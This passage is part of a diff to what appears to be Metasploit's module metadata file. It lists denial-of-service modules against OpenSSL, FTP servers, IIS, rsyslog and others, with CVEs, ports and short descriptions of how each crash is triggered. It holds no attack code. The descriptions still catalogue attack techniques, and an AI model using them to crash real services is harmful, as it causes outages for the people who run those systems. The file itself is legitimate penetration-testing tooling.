+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/ssl/openssl_aesni": {
"name": "OpenSSL TLS 1.1 and 1.2 AES-NI DoS",
"fullname": "auxiliary/dos/ssl/openssl_aesni",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2013-02-05",
"type": "auxiliary",
"author": [
"Wolfgang Ettlinger "
],
- "description": "The AES-NI implementation of OpenSSL 1.0.1c does not properly compute the\n length of an encrypted message when used with a TLS version 1.1 or above. This\n leads to an integer underflow which can cause a DoS. The vulnerable function\n aesni_cbc_hmac_sha1_cipher is only included in the 64-bit versions of OpenSSL.\n This module has been tested successfully on Ubuntu 12.04 (64-bit) with the default\n OpenSSL 1.0.1c package.",
+ "description": "The AES-NI implementation of OpenSSL 1.0.1c does not properly compute the\n length of an encrypted message when used with a TLS version 1.1 or above. This\n leads to an integer underflow which can cause a DoS. The vulnerable function\n aesni_cbc_hmac_sha1_cipher is only included in the 64-bit versions of OpenSSL.\n This module has been tested successfully on Ubuntu 12.04 (64-bit) with the default\n OpenSSL 1.0.1c package.",
"references": [
"CVE-2012-2686",
"URL-https://www.openssl.org/news/secadv/20130205.txt"
@@ -16681,14 +16540,10 @@
"platform": "",
"arch": "",
"rport": 443,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/ssl/openssl_aesni.rb",
"is_install_path": true,
"ref_name": "dos/ssl/openssl_aesni",
@@ -16696,19 +16551,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/syslog/rsyslog_long_tag": {
"name": "rsyslog Long Tag Off-By-Two DoS",
"fullname": "auxiliary/dos/syslog/rsyslog_long_tag",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2011-09-01",
"type": "auxiliary",
@@ -16724,14 +16580,10 @@
"platform": "",
"arch": "",
"rport": 514,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb",
"is_install_path": true,
"ref_name": "dos/syslog/rsyslog_long_tag",
@@ -16739,19 +16591,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/tcp/claymore_dos": {
"name": "Claymore Dual GPU Miner Format String dos attack",
"fullname": "auxiliary/dos/tcp/claymore_dos",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2018-02-06",
"type": "auxiliary",
@@ -16768,12 +16621,8 @@
"platform": "",
"arch": "",
"rport": 3333,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
"mod_time": "2021-05-17 17:04:49 +0000",
"path": "/modules/auxiliary/dos/tcp/claymore_dos.py",
@@ -16782,20 +16631,15 @@
"check": false,
"post_auth": false,
"default_credential": false,
- "notes": {
- },
+ "notes": {},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/tcp/junos_tcp_opt": {
"name": "Juniper JunOS Malformed TCP Option",
"fullname": "auxiliary/dos/tcp/junos_tcp_opt",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -16811,14 +16655,10 @@
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/tcp/junos_tcp_opt.rb",
"is_install_path": true,
"ref_name": "dos/tcp/junos_tcp_opt",
@@ -16826,19 +16666,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-os-restarts"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/tcp/synflood": {
"name": "TCP SYN Flooder",
"fullname": "auxiliary/dos/tcp/synflood",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -16846,20 +16687,14 @@
"kris katterjohn "
],
"description": "A simple TCP SYN flooder",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 80,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/tcp/synflood.rb",
"is_install_path": true,
"ref_name": "dos/tcp/synflood",
@@ -16867,19 +16702,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/upnp/miniupnpd_dos": {
"name": "MiniUPnPd 1.4 Denial of Service (DoS) Exploit",
"fullname": "auxiliary/dos/upnp/miniupnpd_dos",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2013-03-27",
"type": "auxiliary",
@@ -16898,14 +16734,10 @@
"platform": "",
"arch": "",
"rport": 1900,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2022-12-04 17:41:24 +0000",
+ "mod_time": "2025-05-15 08:43:24 +0000",
"path": "/modules/auxiliary/dos/upnp/miniupnpd_dos.rb",
"is_install_path": true,
"ref_name": "dos/upnp/miniupnpd_dos",
@@ -16913,26 +16745,27 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/windows/appian/appian_bpm": {
"name": "Appian Enterprise Business Suite 5.6 SP1 DoS",
"fullname": "auxiliary/dos/windows/appian/appian_bpm",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2007-12-17",
"type": "auxiliary",
"author": [
"guiness.stout "
],
- "description": "This module exploits a denial of service flaw in the Appian\n Enterprise Business Suite service.",
+ "description": "This module exploits a denial of service flaw in the Appian\n Enterprise Business Suite service.",
"references": [
"CVE-2007-6509",
"OSVDB-39500",
@@ -16941,14 +16774,10 @@
"platform": "",
"arch": "",
"rport": 5400,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-13 23:28:13 +0000",
"path": "/modules/auxiliary/dos/windows/appian/appian_bpm.rb",
"is_install_path": true,
"ref_name": "dos/windows/appian/appian_bpm",
@@ -16956,26 +16785,27 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/windows/browser/ms09_065_eot_integer": {
"name": "Microsoft Windows EOT Font Table Directory Integer Overflow",
"fullname": "auxiliary/dos/windows/browser/ms09_065_eot_integer",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2009-11-10",
"type": "auxiliary",
"author": [
"hdm "
],
- "description": "This module exploits an integer overflow flaw in the Microsoft Windows Embedded\n OpenType font parsing code located in win32k.sys. Since the kernel itself parses\n embedded web fonts, it is possible to trigger a BSoD from a normal web page when\n viewed with Internet Explorer.",
+ "description": "This module exploits an integer overflow flaw in the Microsoft Windows Embedded\n OpenType font parsing code located in win32k.sys. Since the kernel itself parses\n embedded web fonts, it is possible to trigger a BSoD from a normal web page when\n viewed with Internet Explorer.",
"references": [
"CVE-2009-2514",
"MSB-MS09-065",
@@ -16984,14 +16814,10 @@
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2022-03-10 18:03:35 +0000",
+ "mod_time": "2025-05-13 23:28:13 +0000",
"path": "/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb",
"is_install_path": true,
"ref_name": "dos/windows/browser/ms09_065_eot_integer",
@@ -16999,6 +16825,11 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-os-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
@@ -17012,16 +16843,14 @@
"auxiliary_dos/windows/ftp/filezilla_admin_user": {
"name": "FileZilla FTP Server Admin Interface Denial of Service",
"fullname": "auxiliary/dos/windows/ftp/filezilla_admin_user",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2005-11-07",
"type": "auxiliary",
"author": [
"aushack "
],
- "description": "This module triggers a Denial of Service condition in the FileZilla FTP\n Server Administration Interface in versions 0.9.4d and earlier.\n By sending a procession of excessively long USER commands to the FTP\n Server, the Administration Interface (FileZilla Server Interface.exe)\n when running, will overwrite the stack with our string and generate an\n exception. The FileZilla FTP Server itself will continue functioning.",
+ "description": "This module triggers a Denial of Service condition in the FileZilla FTP\n Server Administration Interface in versions 0.9.4d and earlier.\n By sending a procession of excessively long USER commands to the FTP\n Server, the Administration Interface (FileZilla Server Interface.exe)\n when running, will overwrite the stack with our string and generate an\n exception. The FileZilla FTP Server itself will continue functioning.",
"references": [
"BID-15346",
"CVE-2005-3589",
@@ -17031,14 +16860,10 @@
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-13 23:28:13 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/filezilla_admin_user",
@@ -17046,26 +16871,27 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/windows/ftp/filezilla_server_port": {
"name": "FileZilla FTP Server Malformed PORT Denial of Service",
"fullname": "auxiliary/dos/windows/ftp/filezilla_server_port",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2006-12-11",
"type": "auxiliary",
"author": [
"aushack "
],
- "description": "This module triggers a Denial of Service condition in the FileZilla FTP\n Server versions 0.9.21 and earlier. By sending a malformed PORT command\n then LIST command, the server attempts to write to a NULL pointer.",
+ "description": "This module triggers a Denial of Service condition in the FileZilla FTP\n Server versions 0.9.21 and earlier. By sending a malformed PORT command\n then LIST command, the server attempts to write to a NULL pointer.",
"references": [
"BID-21542",
"BID-21549",
@@ -17084,7 +16910,7 @@
"ftp"
],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-13 23:28:13 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/filezilla_server_port",
@@ -17092,26 +16918,27 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/windows/ftp/guildftp_cwdlist": {
"name": "Guild FTPd 0.999.8.11/0.999.14 Heap Corruption",
"fullname": "auxiliary/dos/windows/ftp/guildftp_cwdlist",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2008-10-12",
"type": "auxiliary",
"author": [
"kris katterjohn "
],
- "description": "Guild FTPd 0.999.8.11 and 0.999.14 are vulnerable\n to heap corruption. You need to have a valid login\n so you can run CWD and LIST.",
+ "description": "Guild FTPd 0.999.8.11 and 0.999.14 are vulnerable\n to heap corruption. You need to have a valid login\n so you can run CWD and LIST.",
"references": [
"CVE-2008-4572",
"OSVDB-49045",
@@ -17128,7 +16955,7 @@
"ftp"
],
"targets": null,
- "mod_time": "2022-08-08 01:40:15 +0000",
+ "mod_time": "2025-05-13 23:28:13 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/guildftp_cwdlist",
@@ -17136,19 +16963,20 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/windows/ftp/iis75_ftpd_iac_bof": {
"name": "Microsoft IIS FTP Server Encoded Response Overflow Trigger",
"fullname": "auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2010-12-21",
"type": "auxiliary",
@@ -17156,7 +16984,7 @@
"Matthew Bergin",
"jduck "
],
- "description": "This module triggers a heap overflow when processing a specially crafted\n FTP request containing Telnet IAC (0xff) bytes. When constructing the response,\n the Microsoft IIS FTP Service overflows the heap buffer with 0xff bytes.\n\n This issue can be triggered pre-auth and may in fact be exploitable for\n remote code execution.",
+ "description": "This module triggers a heap overflow when processing a specially crafted\n FTP request containing Telnet IAC (0xff) bytes. When constructing the response,\n the Microsoft IIS FTP Service overflows the heap buffer with 0xff bytes.\n\n This issue can be triggered pre-auth and may in fact be exploitable for\n remote code execution.",
"references": [
"CVE-2010-3972",
"OSVDB-70167",
@@ -17168,14 +16996,10 @@
"platform": "",
"arch": "",
"rport": 21,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2024-01-07 15:02:53 +0000",
+ "mod_time": "2025-05-13 23:28:13 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/iis75_ftpd_iac_bof",
@@ -17183,19 +17007,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/windows/ftp/iis_list_exhaustion": {
"name": "Microsoft IIS FTP Server LIST Stack Exhaustion",
"fullname": "auxiliary/dos/windows/ftp/iis_list_exhaustion",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2009-09-03",
"type": "auxiliary",
@@ -17203,7 +17028,7 @@
"Kingcope",
"Myo Soe"
],
- "description": "This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.",
+ "description": "This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.",
"references": [
"CVE-2009-2521",
"BID-36273",
@@ -17222,7 +17047,7 @@
"ftp"
],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-13 23:28:13 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/iis_list_exhaustion",
@@ -17230,19 +17055,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/windows/ftp/solarftp_user": {
"name": "Solar FTP Server Malformed USER Denial of Service",
"fullname": "auxiliary/dos/windows/ftp/solarftp_user",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2011-02-22",
"type": "auxiliary",
@@ -17251,21 +17077,17 @@
"C4SS!0 G0M3S ",
"sinn3r "
],
- "description": "This module will send a format string as USER to Solar FTP, causing a\n READ violation in function \"__output_1()\" found in \"sfsservice.exe\"\n while trying to calculate the length of the string. This vulnerability\n affects versions 2.1.1 and earlier.",
+ "description": "This module will send a format string as USER to Solar FTP, causing a\n READ violation in function \"__output_1()\" found in \"sfsservice.exe\"\n while trying to calculate the length of the string. This vulnerability\n affects versions 2.1.1 and earlier.",
"references": [
"EDB-16204"
],
"platform": "",
"arch": "",
"rport": 21,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-13 23:28:13 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/solarftp_user.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/solarftp_user",
@@ -17273,26 +17095,27 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/windows/ftp/titan626_site": {
"name": "Titan FTP Server 6.26.630 SITE WHO DoS",
"fullname": "auxiliary/dos/windows/ftp/titan626_site",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2008-10-14",
"type": "auxiliary",
"author": [
"kris katterjohn "
],
- "description": "The Titan FTP server v6.26 build 630 can be DoS'd by\n issuing \"SITE WHO\". You need a valid login so you\n can send this command.",
+ "description": "The Titan FTP server v6.26 build 630 can be DoS'd by\n issuing \"SITE WHO\". You need a valid login so you\n can send this command.",
"references": [
"CVE-2008-6082",
"OSVDB-49177",
@@ -17309,7 +17132,7 @@
"ftp"
],
"targets": null,
- "mod_time": "2022-08-08 01:40:15 +0000",
+ "mod_time": "2025-05-13 23:28:13 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/titan626_site.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/titan626_site",
@@ -17317,26 +17140,27 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/windows/ftp/vicftps50_list": {
"name": "Victory FTP Server 5.0 LIST DoS",
"fullname": "auxiliary/dos/windows/ftp/vicftps50_list",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2008-10-24",
"type": "auxiliary",
"author": [
"kris katterjohn "
],
- "description": "The Victory FTP Server v5.0 can be brought down by sending\n a very simple LIST command",
+ "description": "The Victory FTP Server v5.0 can be brought down by sending\n a very simple LIST command",
"references": [
"CVE-2008-2031",
"CVE-2008-6829",
@@ -17354,7 +17178,7 @@
"ftp"
],
"targets": null,
- "mod_time": "2022-08-08 01:40:15 +0000",
+ "mod_time": "2025-05-13 23:28:13 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/vicftps50_list",
@@ -17362,26 +17186,27 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/windows/ftp/winftp230_nlst": {
"name": "WinFTP 2.3.0 NLST Denial of Service",
"fullname": "auxiliary/dos/windows/ftp/winftp230_nlst",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2008-09-26",
"type": "auxiliary",
"author": [
"kris katterjohn "
],
- "description": "This module is a very rough port of Julien Bedard's\n PoC. You need a valid login, but even anonymous can\n do it if it has permission to call NLST.",
+ "description": "This module is a very rough port of Julien Bedard's\n PoC. You need a valid login, but even anonymous can\n do it if it has permission to call NLST.",
"references": [
"CVE-2008-5666",
"OSVDB-49043",
@@ -17398,7 +17223,7 @@
"ftp"
],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-13 23:28:13 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/winftp230_nlst",
@@ -17406,26 +17231,27 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/windows/ftp/xmeasy560_nlst": {
"name": "XM Easy Personal FTP Server 5.6.0 NLST DoS",
"fullname": "auxiliary/dos/windows/ftp/xmeasy560_nlst",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2008-10-13",
"type": "auxiliary",
"author": [
"kris katterjohn "
],
- "description": "This module is a port of shinnai's script. You need\n a valid login, but even anonymous can do it as long\n as it has permission to call NLST.",
+ "description": "This module is a port of shinnai's script. You need\n a valid login, but even anonymous can do it as long\n as it has permission to call NLST.",
"references": [
"CVE-2008-5626",
"OSVDB-50837",
@@ -17442,7 +17268,7 @@
"ftp"
],
"targets": null,
- "mod_time": "2022-08-08 01:40:15 +0000",
+ "mod_time": "2025-05-13 23:28:13 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/xmeasy560_nlst",
@@ -17450,26 +17276,27 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/windows/ftp/xmeasy570_nlst": {
"name": "XM Easy Personal FTP Server 5.7.0 NLST DoS",
"fullname": "auxiliary/dos/windows/ftp/xmeasy570_nlst",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2009-03-27",
"type": "auxiliary",
"author": [
"kris katterjohn "
],
- "description": "You need a valid login to DoS this FTP server, but\n even anonymous can do it as long as it has permission\n to call NLST.",
+ "description": "You need a valid login to DoS this FTP server, but\n even anonymous can do it as long as it has permission\n to call NLST.",
"references": [
"CVE-2008-5626",
"OSVDB-50837",
@@ -17486,7 +17313,7 @@
"ftp"
],
"targets": null,
- "mod_time": "2022-08-08 01:40:15 +0000",
+ "mod_time": "2025-05-13 23:28:13 +0000",
"path": "/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb",
"is_install_path": true,
"ref_name": "dos/windows/ftp/xmeasy570_nlst",
@@ -17494,40 +17321,35 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/windows/games/kaillera": {
"name": "Kaillera 0.86 Server Denial of Service",
"fullname": "auxiliary/dos/windows/games/kaillera",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2011-07-02",
"type": "auxiliary",
"author": [
"Sil3nt_Dre4m"
],
- "description": "The Kaillera 0.86 server can be shut down by sending any malformed packet\n after the initial \"hello\" packet.",
- "references": [
-
- ],
+ "description": "The Kaillera 0.86 server can be shut down by sending any malformed packet\n after the initial \"hello\" packet.",
+ "references": [],
"platform": "",
"arch": "",
"rport": 27888,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-13 23:28:13 +0000",
"path": "/modules/auxiliary/dos/windows/games/kaillera.rb",
"is_install_path": true,
"ref_name": "dos/windows/games/kaillera",
@@ -17535,19 +17357,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166": {
"name": "Windows IIS HTTP Protocol Stack DOS",
"fullname": "auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2021-05-11",
"type": "auxiliary",
@@ -17595,9 +17418,7 @@
"Stability": [
"crash-os-restarts"
],
- "Reliability": [
-
- ],
+ "Reliability": [],
"SideEffects": [
"ioc-in-logs",
"screen-effects"
@@ -17605,16 +17426,12 @@
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/windows/http/ms10_065_ii6_asp_dos": {
"name": "Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service",
"fullname": "auxiliary/dos/windows/http/ms10_065_ii6_asp_dos",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2010-09-14",
"type": "auxiliary",
@@ -17622,7 +17439,7 @@
"Heyder Andrade ",
"Leandro Oliveira "
],
- "description": "The vulnerability allows remote unauthenticated attackers to force the IIS server\n to become unresponsive until the IIS service is restarted manually by the administrator.\n Required is that Active Server Pages are hosted by the IIS and that an ASP script reads\n out a Post Form value.",
+ "description": "The vulnerability allows remote unauthenticated attackers to force the IIS server\n to become unresponsive until the IIS service is restarted manually by the administrator.\n Required is that Active Server Pages are hosted by the IIS and that an ASP script reads\n out a Post Form value.",
"references": [
"CVE-2010-1899",
"OSVDB-67978",
@@ -17632,14 +17449,10 @@
"platform": "",
"arch": "",
"rport": 80,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-13 23:28:13 +0000",
"path": "/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb",
"is_install_path": true,
"ref_name": "dos/windows/http/ms10_065_ii6_asp_dos",
@@ -17647,26 +17460,27 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_dos/windows/http/pi3web_isapi": {
"name": "Pi3Web ISAPI DoS",
"fullname": "auxiliary/dos/windows/http/pi3web_isapi",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2008-11-13",
"type": "auxiliary",
"author": [
"kris katterjohn "
],
- "description": "The Pi3Web HTTP server crashes when a request is made for an invalid DLL\n file in /isapi for versions 2.0.13 and earlier. By default, the non-DLLs\n in this directory after installation are users.txt, install.daf and\n readme.daf.",
+ "description": "The Pi3Web HTTP server crashes when a request is made for an invalid DLL\n file in /isapi for versions 2.0.13 and earlier. By default, the non-DLLs\n in this directory after installation are users.txt, install.daf and\n readme.daf.",
"references": [
"CVE-2008-6938",
"OSVDB-49998",
@@ -17691,7 +17505,7 @@
"https"
],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-05-13 23:28:13 +0000",
"path": "/modules/auxiliary/dos/windows/http/pi3web_isapi.rb",
"is_install_path": true,
"ref_name": "dos/windows/http/pi3web_isapi",
@@ -17699,19 +17513,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
